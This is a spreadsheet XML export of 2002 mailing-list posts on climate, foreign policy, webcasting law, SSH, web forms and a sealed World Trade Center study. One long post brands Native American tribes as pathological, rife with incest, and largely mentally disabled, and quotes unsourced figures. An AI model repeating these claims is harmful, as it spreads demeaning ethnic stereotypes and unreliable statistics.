&gt; basis.  Water vapor may actually be the key greenhouse gas, something
&gt; that CO2 only indirectly effects through its interaction with the
&gt; biosphere.Correct.Data on relative contributions of greenhouse gasses:
http://www.grida.no/climate/vital/05.htmNote that methane concentrations now are *much* higher than pre-industrial
levels (many cows farting, and rice paddies outgassing), and methane is also
a contributor in the formation of atmospheric water vapor. Another clearly
anthropogenic increase in a greenhouse gas. I'm in favor of reductions in
methane levels as well.Data on water vapor here:
http://www.agu.org/sci_soc/mockler.html&gt; CO2 was an easy mark for early environmentalism, but all the recent
&gt; studies and data I've seen gives me the impression that it is largely a
&gt; passenger on the climate ride rather than the driver.I tend to think that holistic, and techical approaches would work best in
reducing global warming. I favor an energy policy that has a mix of solar,
wind and nuclear, with all carbon-based combustion using renewable sources
of C-H bonds. Aggressive pursuit of carbon sink strategies also makes sense
(burying trees deep underground, for example). Approaches that involve
reductions in lifestyle to a "sustainable" level are unrealistic --
Americans just won't do it (you'd be surprised at the number of climate
change researchers driving SUVs). But, as California showed during last
year's energy crisis, shifts in patterns of consumption are possible, and
improved efficiency is an easy sell.- Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">
[can't think of how I'd be running
afoul of the spam filters with this
post, so here's the second try...]Kissinger's book _Does America Need
a Foreign Policy?_ provides a few
handy abstractions:&gt; The ultimate dilemma of the statesman is to strike a balance between
&gt; values ["idealism"] and interests ["realism"] and, occasionally,
&gt; between peace and justice.Also, he views historical American
approaches to foreign policy as a
bundle of three fibers:Hamiltonian - We should only get
  involved in foreign adventures
  to preserve balances of power.Wilsonian - We should only get
  involved in foreign adventures
  to further democracy, etc.Jacksonian - We should never get
  involved in foreign adventures.
  Unless we're attacked.  Then we
  go Rambo.He has tactfully left out the hard
realists*; as for the rest I gather
wilsonians play the idealists, and
hamiltonians act where values and
interests intersect, and jacksonians 
act only when values and interests
overlap.Kissinger himself seems to be a
Hamiltonian; much of the book is
about how he thinks we ought to
be shaping the balance of power
in various foreign regions.Maybe I've been too affected by
Kant, but I can't see that such
a strategy works unless one can
count on a Bismarck runnning it:
how lopsided does the US look if
everyone tries to run a balance
of power politics?- -Dave*
&gt; The road to empire leads to domestic decay because, in time, the claims
&gt; of omnipotence erode domestic restraints.  No empire has avoided the
&gt; road to Caesarism unless, like the British Empire, it devolved its
&gt; power before this process could develop.  In long-lasting empires,
&gt; every problem turns into a domestic issue [which should be handled
&gt; very differently from international ones] because the outside world
&gt; no longer provides a counterweight.  And as challenges grow more
&gt; diffuse and increasingly remote from the historic domestic base,
&gt; internal struggles become ever more bitter and in time violent.
&gt; A deliberate quest for hegemony is the surest way to destroy the
&gt; values that made the United States great.Kings and tyrants generically have
followed the same power politics:
garner popular support by keeping
potential oligarchs down.  In other
traditions, a king is a legitimate
tyrant, and a tyrant an illegitimate
king.  In the US, I'd hope that we,
like Samuel, wouldn't naturally make
such fine distinctions.
</t>
  </si>
  <si>
    <t xml:space="preserve">--]
--] Anyone heard of this law before?Back when I was running the WSMF shoutcast server these restrictions were
just being placed on netcasters. Most folks laughed it off. Now with the
license fees its not laughable anymore. If you pay the fee you are bound
to the restrictions, if you dont your running the criminal line.I still run a stream up on live365. Its been playing the same 10 hour
block of Jean Shepard shows for the last year. I really should change them
up.If I were going to do the old WSMF shoutcast now adays I would either
spend lots of time going over regulations to see what I can or cannot do
or I would just chuck the regs out and do what I want. Or I might write
some apps to stay in regs ..I dont know..one thing is for sure it
defiently takes the spontaneous edge off things:)-F Murray Abraham
F Scott Fitzgerald
F Hillary Rossen-tom
</t>
  </si>
  <si>
    <t>On Wed, 25 Sep 2002, Gordon Mohr wrote:
&gt; In contrast, take a look at this article by Simon J. Wilkie of
&gt; Caltech:Wow, that Wilkie article is the single best explanation I've seen.The open question is whether any analysis before the fact warned the
politicians, or whether the politicians were forewarned and went ahead.  
What did they know and when did they know it?</t>
  </si>
  <si>
    <t>On Wed, 2002-09-25 at 13:34, bitbitch@magnesium.net wrote:
&gt; 
&gt; This, kiddies was apparently the legislative beginnings of the whole
&gt; streaming audio-gets-spanked-by-fees ruling that came down in the
&gt; earlier parts of this year.  This first act applied to non-exempt,
&gt; non-subscription transmission services.  When Congress got around in
&gt; 1998 and realized that webcasting services -might- be different
&gt; (though I honestly can't see how) they wrote in the provision through
&gt; the DMCA to include such transmissions.
The restrictive law regarding audio is actually the accumulated cruft of
30 years of various legislative acts. The totality of what we have now
come from various parts of all the following re: sound recordings:1998 - DMCA
1995 - Digital Performance Right in Sound Recordings Act
1992 - Audio Home Recording Act
1976 - Copyright Act amendment
1972 - Copyright Act amendmentIt is worth noting that many people have forgotten about the 1976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1976 amendment.-James Rogers
 jamesr@best.com</t>
  </si>
  <si>
    <t xml:space="preserve">Let's say you're behind a firewall and have a NAT address.
Is there any way to telnet to a linux box out there in the world
and set your DISPLAY in some way that you can create
xterms on your own screen?- Joe-- 
That girl became the spring wind
She flew somewhere, far away
Undoing her hair, lying down, in her sleep
She becomes the wind.
</t>
  </si>
  <si>
    <t xml:space="preserve">A friend in Dublin is mailing me the CD which was in the UK Sunday 
Times. I've just been advised that running it in a Win32 machine is 
dangerous as all get out.http://www.theregister.co.uk/content/4/27232.html-- whump
----
Bill Humphries 
http://www.whump.com/moreLikeThis/
</t>
  </si>
  <si>
    <t xml:space="preserve">"Joseph S. Barrera III"  writes:&gt; Let's say you're behind a firewall and have a NAT address.
&gt; Is there any way to telnet to a linux box out there in the world
&gt; and set your DISPLAY in some way that you can create
&gt; xterms on your own screen?Assuming your local display is X, SSH.-- 
Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
</t>
  </si>
  <si>
    <t xml:space="preserve">Wow, three replies already, all recommending ssh. Thanks!- JoeBack in my day, they didn't have ssh. Then again, back in my day,
they didn't have firewalls. And I still miss X10's active icons.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Subject: Re: Digital radio playlists are prohibited?!
&gt; From: James Rogers 
&gt; To: fork@spamassassin.taint.org
&gt; Date: 25 Sep 2002 12:52:15 -0700
&gt; 
&gt; On Wed, 2002-09-25 at 01:19, Rohit Khare wrote:
&gt; &gt; Anyone heard of this law before?
&gt; 
&gt; 
&gt; Absolutely.  More accurately, it is part of the RIAAs "regulation" for
&gt; broadcasting music under their auspices.  This is actually part of the
&gt; default statutory license the RIAA is compelled to issue.  You can try
&gt; and establish your own contract with each of the individual publishers
&gt; in addition to the writers, but that is a Herculean undertaking in its
&gt; own right.  The details are really gross and complicated.Perhaps the stations cannot publish digital playlists, but you can get
them from www.starcd.com anyway. They use some sort of
listening and recognition technology to identify the music played
on over 1000 US radio stations.Jeff;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 25 Sep 2002, Joseph S. Barrera III wrote:&gt; Let's say you're behind a firewall and have a NAT address.
&gt; Is there any way to telnet to a linux box out there in the world
&gt; and set your DISPLAY in some way that you can create
&gt; xterms on your own screen?As other people suggested: SSH. PuTTY 	http://www.chiark.greenend.org.uk/~sgtatham/putty/download.htmlcan do it. Can run, say xclock (I'm running an X server under W32 at work,
tunneling through a NAT box), but from Linux, not from Solaris.  Probably
OpenSSH misconfigurat5ion.
</t>
  </si>
  <si>
    <t xml:space="preserve">
I wanted to get back to this but didn't have the time.  I actually lived on
a couple different Indian reservations growing up in the Pacific Northwest
and also spent a fair amount time in Lakota/Sioux country as well.  And my
parents have lived on an even more diverse range of Indian reservations than
I have (my experience being a direct result of living with my parents).  I
do get a lot of my information first-hand, or in some cases, second-hand
from my father.The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$10-30k per
person, depending on the tribe.  The dividend money comes from a number of
places, with the primary sources being the Federal Gov't and various
businesses/assets owned by the Indian corporation.You have to understand a couple things:  First, a great many Indian tribes
are run as purely communist enterprises.  Everyone gets a check for their
share no matter what.  One of the biggest problems this has caused is very
high unemployment (often 70-90%) for tribal members, who are more than happy
take their dividend and not work.  The dividend they receive from the
corporation often constitutes their sole "income" for government accounting
purposes.  Unfortunately, to support this type of economics when no one
works, they've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government.It should be pointed out that while many of these Indian corporations are
ineptly run, and mostly provide sinecures for other Indians, a minority are
very smartly managed and a few hire non-Indian business executives with good
credentials to run their business divisions.  An example of this is the
Haida Corporation, which while having less 1,000 tribal shareholders, has
billions of dollars in assets and the various corporations they own have
gross revenues in the $200-300 million range (and growing).  Yet the
dividend paid out is strictly controlled, about $20k in this particular
case, and they engaged in a practice of waiting a couple decades before
drawing money from any of the assets they were granted which has led to
intelligent investment and use.  They don't eat their seed corn, and have
actually managed to grow their stash.  In contrast, a couple islands over,
there is another tribe of ~2,000 people that has a net loss of about $50
million annually IIRC while being regularly endowed by the Federal
government with several billions of dollars in valuable assets.  This
particular tribe has a modest income in theory, but the actual expenditures
per person annually is in the hundreds of thousands of dollars, and many
borrow money against future income.  Incidentally, in this particular case,
the people that ARE working frequently pull in a few hundred thousand
dollars a year, much of which goes back to the tribal corporation rather
than their own pockets.Somewhat annoying, the Federal government semi-regularly grants valuable
assets to these tribes when they've burned through the ones previously given
where feasible, typically selling the assets to American or foreign
companies.  And the cycle continues.So what is the primary problem for the tribes that have problems?  In a
nutshell, a thoroughly pathological culture and society.Few women reach the age of 16 without getting pregnant.  Incest, rape, and
gross promiscuity is rampant.  Inbreeding, heavy drug abuse during
pregnancy, and other environmental factors have created tribes where a very
substantial fraction of the tribe is literally mentally retarded.  Many of
the thoughtful and intelligent tribe members leave the reservation at the
earliest opportunity, mostly to avoid the problems mentioned above.  On one
reservation my parents lived, the HIV infection rate was &gt;70%.  Many of
these societies are thoroughly corrupt, and the administration of the law is
arbitrary and capricious (they do have their own judges, courts, police
etc).In short, many of these tribes that are still hanging together are in a
shambles because they have become THE most pathological societies that I
have ever seen anywhere.  Because of their legal status, there really aren't
that many consequences for their behavior.  There are many things that I
could tell you that I've seen that you probably would not believe unless
you'd seen it yourself.  There are always good people in these tribes, but
it has gotten to the point where the losers and idiots outnumber the good
guys by a fair margin many times, and this IS a mobocracy typically.  (BTW,
if any of you white folk wants to experience overt and aggressive racism as
a minority in a place where the rule of law is fiction and the police are
openly thugs, try living on one of these messed up Indian reservations.  It
will give you an interesting perspective on things.)There are only two real situations where you find reasonably prosperous
Indians.  The first is in the rare case of tribes run by disciplined and
intelligent people that have managed their assets wisely.  The second is
where the tribe has dispersed and assimilated for the most part, even if
they maintain their tribal identity.  In both of these cases, the tribal
leaders reject the insular behavior that tends to lead to the pathological
cases mentioned above.The Indians are often quite wealthy technically, and a lot of money is spent
by the tribe per capita.  And the actual reportable income is quite high
when you consider how many are living entirely off the tribal dole.  It is
just that their peculiar economic structure does not lend itself well to
ordinary economic analysis by merely looking at their nominal income.  The
poverty is social and cultural in nature, not economic.  This was my
original point.
On a tangent:One thing that has always interested me is the concept of quasi-tribal
corporate socialism.  Many Indian tribes implement a type of corporate
socialism that is mind-bogglingly bad in execution.  That they use this
structure at all is an accident of history more than anything.  But what has
interested me is that the very smartly managed ones do surprisingly well
over the long run.  It is like a Family Corporation writ large.It seems that in a future where "familial" ties will be increasingly
voluntary, the general concept may have some merit in general Western
society, serving to create a facsimile of a biological extended family with
the included dynamics, but with an arbitrary set of self-selecting
individuals.Damn that was long (and its late), and it could have been a lot longer.-James Rogers
 jamesr@best.com On 9/22/02 3:53 PM, "John Hall"  wrote:
&gt; 
&gt; As I understand it, there is a huge difference between native Americans
&gt; who speak english at home and those who do not.  I don't have figures
&gt; that separate those at hand, though.
&gt; 
&gt; 1989 American Indians (US Pop as a whole) -- Families below poverty
&gt; 27.2% (10%), Persons below poverty 31.2 (13.1), Speak a language other
&gt; than English 23 (13.8) Married couple families 65.8 (79.5) Median family
&gt; income $21,619 ($35,225) Per Capita $8,284 ($14,420).
</t>
  </si>
  <si>
    <t xml:space="preserve">
In essence, hindsight justification.  The progressives weren't in the
middle, they were in a society at one end and they wanted a society at
the other end.  The middle is more or less where they got stopped.As to an intervention that worked, I actually have some nice things to
say about the SEC, at least in theory.  I have a few nasty things to say
as well, but on the whole it has been a very good thing.
&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Geege
&gt; Schuman
&gt; Sent: Tuesday, September 24, 2002 6:37 PM
&gt; To: fork@spamassassin.taint.org
&gt; Subject: Liberalism in America
&gt; 
&gt; liberalism
&gt; propagandized as meddling
&gt; in truth, the middle
&gt; 
&gt; "American liberalism believes that in this respect it has made a major
&gt; contribution to the grand strategy of freedom. Where both capitalists
and
&gt; socialists in the 1930's were trying to narrow the choice to either/or
--
&gt; either laissez-faire capitalism or bureaucratic socialism -- the New
Deal
&gt; persisted in its vigorous faith that human intelligence and social
&gt; experiment could work out a stable foundation for freedom in a context
of
&gt; security and for security in a context of freedom. That faith remains
the
&gt; best hope of free society today."
&gt; 
&gt; fluid yet crunchy,
&gt; gg
&gt; 
&gt; 
&gt; 
&gt; 
&gt;  http://www.english.upenn.edu/~afilreis/50s/schleslib.html
</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday, September 27, 2002, at 11:17 AM, Jim Whitehead wrote:&gt; I attended the OSCOM Open Source Content Management workshop at 
&gt; Berkeley
&gt; yesterday.I really wanted to go to this, especially to look at XOPUS. 
Unfortunately, we're launching a new intranet at work next week and I 
couldn't get away. XOPUS + an XML native DB such as Xindice looks like 
something that could hit a home run.-- whump
"I have a theory, it could be bunnies."
</t>
  </si>
  <si>
    <t xml:space="preserve">Adjournment of Michel Fournier's big Jump in May, 2003.Two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stratosphÃ©rique allowing to raise
thecapsule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"VederÃ², si averÃ² si grossi li coglioni, come ha il re di Franza."
&gt;   ("Let's see if I've got as much balls as the King of France!")
&gt;   - Pope Julius II, 2 January 1511
</t>
  </si>
  <si>
    <t>I attended the same conference, and was impressed by a few systems that
Jim didn't mention. In terms of CMS, the following all had apparently
been used in some fairly large implementations and looked like some
pretty strong competition to commercial systems:
- Midgard, http://www.midgard-project.org/ , a PHP-based content
management framework that with other programs combines to be a full CMS
- Redhat CCM CMS, Java-based: http://www.spamassassin.taint.org/software/ccm/cms/
- OpenCMS, Java-based: http://www.opencms.orgThere was agreement that usability has not generally been an open source
strength, but both Plone and Xopus represented some real movement
towards improving that situation.I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print/PDF dimension to content other than the
occasional "...and you can use FOP to make PDF" as if that was
functional): this seems more the case in open source content management
than in commercial content management, and probably makes XML easier to
ignore (if HTML is the be-all and end-all of the output...).The honesty was refreshing, Phil Suh complained about the state of
current tools (both open source and commercial), and I wish I'd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$500,000 on the rollout... it'll scale
pretty well." Another quote (citing Brendan Quinn): "content management
problems are either trivial or impossible."Mac OS X is getting popular, of the laptops there it was an even 1/3
each of Mac, Linux, Windows.I am sure it wasn't news to Jim, but I can't wait to try Subversion, a
CVS replacement that supports some of the newer features of WebDAV:
http://subversion.tigris.org/I'm also eager to try Xopus, I hope the developers make it back home
safely, they said they'd only been in America four days but were already
homeless...Max</t>
  </si>
  <si>
    <t xml:space="preserve">What's wrong with doing business over the Web?  Web forms.  There's
promising replacements forms, but this is the current state of the
industry: o You find something that you want to fill out.  It's a partnership form,
   a signup for a Web seminar, a request for more information, anything.
 o You start wasting time typing in all those stupid fields and spend
   about 10 minutes going through all their stupid qualification hoops
   just to get a small piece of information , whitepaper, or a callback
   when halfway through, you start to wonder if it's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"more&gt;" tag on the second
   row was offscreen so it was impossible to select any country except
   about two dozen third world countries. 
 o Even worse, ever time you hit submit, all forms based things complain
   about using the universal country phone number format and will cause
   you to re-enter dashes instead of dots.
 o When you get something that's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won't be able to ever submit anything due
   to it being impossible to ever submit a valid set of information that
   is internally non-conflicting according to whatever fhead wrote their
   forms submission.What's wrong with this picture?  The company is screwing you by wasting
your time enforcing their data collection standards on you.  I'm sure there's
someone in that company that would be willing to accept "US", "U.S", "USA"
"United States", "U of A", "America", etc. and would know exactly which
freaking country the interested party was from instead of forcing them
to waste even more time playing Web form geography.  I'm starting to see the light of Passport.  You want more information?  Hit
this passport button.  Voila.  IE6 and Netscape 6,7 have pre-forms sutff,
but I always turn it off because you never know when there's that one field
that you don't want to submit to the person you are submitting to that 
automatically gets sent, i.e. the privacy stuff is well beyond the 
average user who will get screwed on privacy stuff.  So, if crappy forms-based submission is the state of practice for
business enablement on the Web, I can't see this whole data submission
and hurry up and wait for us to get back to you business process as
working all that well.
Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">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it.ChrisOn Sat, 28 Sep 2002, Gregory Alan Bolcer wrote:&gt;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passport button.  Voila.  IE6 and Netscape 6,7 have pre-forms sutff,
&gt; but I always turn it off because you never know when there's that one field
&gt; that you don't want to submit to the person you are submitting to that 
&gt; automatically gets sent, i.e. the privacy stuff is well beyond the 
&gt; average user who will get screwed on privacy stuff.  
&gt; 
&gt; So, if crappy forms-based submission is the state of practice for
&gt; business enablement on the Web, I can't see this whole data submission
&gt; and hurry up and wait for us to get back to you business process as
&gt; working all that well.
&gt; 
&gt; 
&gt; Greg
&gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "G" == Gregory Alan Bolcer  writes:    G&gt; So, if crappy forms-based submission is the state of practice
    G&gt; for business enablement on the Web, I can't see this whole data
    G&gt; submission and hurry up and wait for us to get back to you
    G&gt; business process as working all that well.I love this business.  If a bridge falls over, the architect or the
engineer is in court the next day, but when a /software/ bridge falls
over, we blame the air beneath it, or the phase of the moon, or
(more often) the people walking on it.   "What idiots!  Don't they know you're supposed to walk on the
   /balls/ of your feet, not lead with your heels?  Didn't they read
   the blueprints?  They were posted in the town hall.  Any idiot
   would know the 0.75Hz heel cadence would pop rivets on the
   structural supports!  Geez. Pedestrians are /so/ stupid."Ours is the /only/ industry that can hold itself 100% un-responsible
for any and all sloth-inflicted doom, and the only industry which can
/also/ get away with feeding this myth of infallibility unquestioned
to the media, to investors, to students and to each other.   "God I hate telephones.  Telephones are stupid. I used a telephone
   to, like, call my broker yesterday, and y'know, just /after/ I'd
   ordered those 2000 shares of Nortel ..."You just gotta love a mass-delusion like that.Although it's like a total shock to 99.999% (5nines) of all the
employed website designers out there, the truth is webforms /can/
accept "U.S. of A" as a country.  Incredible, but true.  Web forms can
also accept /multiple/ or even /free-form/ telephone numbers and can
even be partitioned into manageable steps. All this can also be done
without selling exclusive rights to your wallet to the World's
Second-Richest Corporation (assuming Cisco is still #1) and vendor
locking your business into their "small transaction fee" tithe.Of course, try and tell one of those 5-niners that and they'll get all
defensive, black list you as a sh*t disturber and undermine your
reputation with the boss...  not that I'm speaking first-hand or
anything ;)-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Saturday, September 28, 2002, at 12:54 PM, Gary Lawrence Murphy 
wrote:&gt;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tithe.Yes, but this is what normally happened:Engineer: we can put an input validator/parser on the backend to do 
that.Designer: there's a JavaScript library that can do some of the 
pre-validation.Creative Director: I want it in blue, with a zooming logo.Engineer: can we get to that later, we need to meet functional specs.Creative Director: You *don't* understand. *I* want it in blue.Creative Director: Oh, and the site launches this Friday because I sent 
out a press release about our new strategic partnership with HypeCorp.Designer: fine, we'll just put a list of countries in a drop down.Engineer: and we can validate against that list.Creative Director: I don't give a shit. As long as it's in blue. And 
has a link to my press release.----
Bill Humphries 
http://www.whump.com/moreLikeThis/
</t>
  </si>
  <si>
    <t xml:space="preserve">At 08:18 AM 9/28/02 -0700, Gregory Alan Bolcer wrote:&gt;IE6 and Netscape 6,7 have pre-forms sutff,
&gt;but I always turn it off because you never know when there's that one field
&gt;that you don't want to submit to the person you are submitting to that
&gt;automatically gets sent, i.e. the privacy stuff is well beyond the
&gt;average user who will get screwed on privacy stuff.Opera 6 has an interesting way around this. You just right-click on each 
field and bring up a choice of prefilled local information that you can 
then choose to enter into the form.Now if they can just fix the $@!$@$# irritating memory problems that Opera6 
has....Hakon, you listening?Udhay-- 
((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "B" == Bill Humphries  writes:    B&gt; Yes, but this is what normally happened:    B&gt; Engineer: we can put ...
    B&gt; Designer: there's a ...
    B&gt; Creative Director: I want it in blue ...
Yup, seen it happen oodles of times, only all three of those folks
are one and the same person.  The fourth is the business manager
who says "whatever, so long as you do it on your own time"-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear flatware,I'm about to undertake a massive project to index/catalog well over one 
thousand CDs that have been ripped to MP3 and set up a server to stream 
them to different rooms in the house. (Yes, I own them all, no I'm not 
broadcasting them to the 'net.) Can anyone give me some recommendations 
as to what (free? opensource?) software is best suited for this task? I 
know there are a few FoRKs out there who have tackled this problem before...I'd like to be able to dynamically generate play lists from queries like 
"Jazz released between 1950 and 1960" or "Artist such and such between 
these dates" or "Just these artists" or "Just this genre" - you get the 
idea. In addition to having multiple streams that I can tune in to (a la 
DMX), I'd like to be able to browse the database through a web interface 
from other computers in the house and pull specific music down to 
wherever I am.
Thanks,
Elias
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy wrote:
&gt;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Ah, but you've just gotten to the crux of the
situation.  There's good design and bad design. 
There's good testing and bad testing.  The problem
is, anyone can design a good Web form, but nobody
does.  I think "best practices" hasn't caught up
on main street Web enablement yet.  There's some
really great packages on how to do this stuff and
in fact the usability people knew that Web forms needed
to be fixed 5 years ago, so that's why we got XForms
and  XHTML.  You can shoot yourself in the foot and
people usually do.  What the problem is, they don't
even recognize that they're gimpy--ever.  They just
keeping trundling along making a mess of everything
assured in their job security that they can build
Web forms without even caring if they can be
used or not beyond their test machine.If you had a piece of software and a security warning
came out 5 years ago on it, would you run that software?
Wouldn't you have patched or upgraded something so fundamentally
broken 4 years and 11 months ago?  What I want to know
is why would someone use Web forms best practices from
5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can't get across the
bridge, then it's broken regardless of whose fault
it really is, and it's the business that 
needs to take responsibility as they are the ones that
wanted to put the bridge there in the first place. 
Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">At 09:02 AM 9/29/02 -0700, Elias wrote:&gt;I'm about to undertake a massive project to index/catalog well over one 
&gt;thousand CDs that have been ripped to MP3 and set up a server to stream 
&gt;them to different rooms in the house. (Yes, I own them all, no I'm not 
&gt;broadcasting them to the 'net.) Can anyone give me some recommendations as 
&gt;to what (free? opensource?) software is best suited for this task? I know 
&gt;there are a few FoRKs out there who have tackled this problem before...See if http://www.jwz.org/gronk/ meets your needs.Udhay-- 
((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
</t>
  </si>
  <si>
    <t>http://www.post-gazette.com/columnists/20020905brian5.asp</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
has been sent to you by khare@alumni.caltech.edu.
Another reminder that the moral writ of intellectual property is -- and ought to --be more limited than real property. Private money paid for these bits, but expropriation may be fairer for IP than real-P.Rohitkhare@alumni.caltech.edu
Vast Detail on Towers' Collapse May Be SealedSeptember 30, 2002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nation's most respected
engineering minds. It includes computer calculations that
have produced a series of three-dimensional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 who has agreed that
certain material can remain secret for the time being - has
approved standard legal arrangements that, should the
lawsuit be settled before trial, could cause crucial
material generated by the competing sides to be withheld. "We're obviously in favor of releasing the information, but
we can't until we're told what to do," said Matthys Levy,
an engineer and founding partner at Weidlinger Associates,
who is a consultant in the case and the author of "Why
Buildings Fall Down: How Structures Fail" (Norton, 2nd
edition, 2002). "Let's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Silverstein, whose companies own a lease on the
trade center property, and a consortium of insurance
companies. Mr. Silverstein maintains that each jetliner
that hit the towers constituted a separate terrorist
attack, entitling him to some $7 billion, rather than half
that amount, as the insurance companies say. As both sides have prepared their arguments, they have
spent hundreds of thousands of dollars acquiring expert
opinion about exactly what happened to the towers. Dean Davison, a spokesman for Industrial Risk Insurers of
Hartford, one of the insurance companies in the suit, said
of the findings, "There are some confidentiality agreements
that are keeping those out of the public domain today." He
conceded that differing opinions among the more than 20
insurers on his side of the case could complicate any
release of the material. As for his own company, whose consultants alone have
produced more than 1,700 pages of analysis and thousands of
diagrams and photographs, Mr. Davison said every attempt
would be made to give the material eventually to "public
authorities and investigative teams." Still, some of that analysis relies on information like
blueprints and building records from other sources, like
the Port Authority of New York and New Jersey, which built
and owned the trade center and supports Mr. Silverstein in
the suit. Mr. Davison said he was uncertain how the
differing origins of the material would influence his
company's ability to release information. In a statement, the Port Authority said access to documents
would be "decided on a case-by-case basis consistent with
applicable law and policy," adding that it would cooperate
with "federal investigations." The fate of the research is particularly critical to
resolve unanswered questions about why the towers fell,
given the dissatisfaction with the first major inquiry into
the buildings' collapse. That investigation, led by the
Federal Emergency Management Agency, was plagued by few
resources, a lack of access to crucial information like
building plans, and infighting among experts and officials.
A new federal investigation intended to remedy those
failings has just begun at the National Institute of
Standards and Technology, or NIST, an agency that has
studied many building disasters. Officials with NIST have said it could take years to make
final determinations and recommendations for other
buildings, a process they now acknowledge might be speeded
up with access to the analysis done by the consultants on
the lawsuit. Gerald McKelvey, a spokesman for Mr. Silverstein, said of
the real estate executive's own heavily financed
investigative work, "We decline to comment other than to
say that Silverstein is cooperating fully with the NIST
investigation." A spokesman for the agency confirmed it was
in discussions with Mr. Silverstein on the material, but
said no transfer had taken place. With no shortage of money or expertise, investigations by
both sides in the legal case have produced a startling body
of science and theory, some of it relevant not only to the
trade center disaster but to other skyscrapers as well. "The work should be available to other investigators," said
Ramon Gilsanz, a structural engineer and managing partner
at Gilsanz Murray Steficek, who was a member of the earlier
inquiry. "It could be used to build better buildings in the
future." Legal experts say confidentiality arrangements like the one
governing the material can lead to a variety of outcomes,
from full or partial disclosure to destruction of such
information. In some cases, litigants who paid for the
reports may make them public themselves. Or they may ask to
have them sealed forever. 
"It is not unusual for one party or another to try to keep
some of those documents secret for one reason or another,
some legitimate, some not," said Lee Levine, a First
Amendment lawyer at Levine Sullivan &amp; Koch in Washington. Mr. Levine said that because of the presumed value of the
information, the court might look favorably on requests to
make it public. But the uncertainty over the fate of the
material is unnerving to many people, especially experts
who believe that only a complete review of the evidence -
not piecemeal disclosures by litigants eager to protect
their own interests - could lead to an advance in the
federal investigation of the trade center. "It's important for this to get presented and published and
subjected to some scrutiny," said Dr. John Osteraas,
director of civil engineering practice at Exponent Failure
Analysis in Menlo Park, Calif., and a consultant on the
case, "because then the general engineering community can
sort it out." The scope of the investigation behind the scenes is vast by
any measure. Mr. Levy and his colleagues at Weidlinger
Associates, hired by Silverstein Properties, have called
upon powerful computer programs, originally developed with
the Pentagon for classified research, to create a model of
the Sept. 11 attack from beginning to end. The result is a compilation of three-dimensional images of
the severed exterior columns, smashed floor and damaged
core of the towers, beginning with the impacts and
proceeding up to the moments of collapse. Those images -
which Mr. Levy is not allowed to release - have helped
pinpoint the structural failures. The FEMA investigators did not have access to such computer
modeling. Nor did the FEMA team have unfettered access to
the trade center site, with all its evidence, in the weeks
immediately after the attacks. But no such constraints
hampered engineers at LZA/Thornton-Tomasetti, brought to
the site for emergency work beginning on the afternoon of
Sept. 11. Daniel A. Cuoco, the company president and a
consultant to Silverstein Properties on the case, said he
had assembled detailed maps of the blazing debris at ground
zero in models that perhaps contain further clues about how
the towers fell. Though the FEMA team could not determine "where things
actually fell," Mr. Cuoco said, "we've indicated the
specific locations." Mr. Cuoco said he could not reveal any additional details
of the findings. Nor would Mr. Osteraas discuss the details
of computer calculations his company has done on the spread
of fires in large buildings like the twin towers. Mr.
Osteraas has also compiled an extensive archive of
photographs and videos of the towers that day, some of
which he believes have not been available to other
investigators. And the investigation has not limited itself to computers
and documentary evidence. For months, experiments in wind
tunnels in the United States and Canada have been examining
the aerodynamics that fed the flames that day and stressed
the weakening structures. Jack Cermak, president of Cermak Peterka Peterson in Fort
Collins, Colo., was retained by the insurance companies but
had previously performed wind-tunnel studies for the
original design of the twin towers nearly 40 years ago. For
the legal case, Dr. Cermak said, "we've done probably more
detailed measurements than in the original design." "The data that have been acquired are very valuable in
themselves for understanding how wind and buildings
interact," Dr. Cermak said. "Some of the information may be
valuable for the litigation," he said, adding, "I think
I've told you all I can."http://www.nytimes.com/2002/09/30/nyregion/30TOWE.html?ex=1034388663&amp;ei=1&amp;en=0d3143a997e5e2e1HOW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t>
  </si>
  <si>
    <t xml:space="preserve">Michael wrote:
&gt; 
&gt; http://www.post-gazette.com/columnists/20020905brian5.asp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there'd be some.Instead it's a Post-Gazette column by Brian O'Neill
lamenting the fact that some people know how to
fill out a permit so that they can take advantage
of their right to peaceable assembly.  Obviously
he's poking fun at the idea that specific groups
get specific "zones" and that it's not up to the
police to decide what messages and signs get put into
what zones to most expediently keep order.  The problem is that politics have gotten so muddied
nowadays, that shouting down and unpeaceably disrupting
political rallies that you don't agree with has become
common practice.  The courts have constantly ruled
that there are some restrictions on the first amendment.
They teach you that your very first year of law school.I think that given the information as laid out by the story,
Mr. O'Neill has confused free speech with action.  Free
speech or even protected speech as practiced by almost 
every American seems to involve the ability to communicate
an idea to an unknown audience.  Action involves directing
a specific comment to a specific well-defined individual or audience
that has immediate, harmful, and sometimes physical 
effects that is easily forseeable by any reasonable person. I think Bill Neel of Butler needs to go back to school
as obviously he must have been sleeping in his civics
class or else they didn't teach civics in mini-guantanamo, OH
65 years ago.Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">Owen Byrne wrote:&gt; What a load of crap. Politics are somehow more muddy now?  I'd say that
&gt; its considerably
&gt; clearer - the vast majority of people feel disenfranchised, and the
&gt; common practice of
&gt; putting protestors in boxes is done usually to hide them from TV
&gt; cameras, visiting dignitaries,
&gt; etc, further exacerbating those feelings.
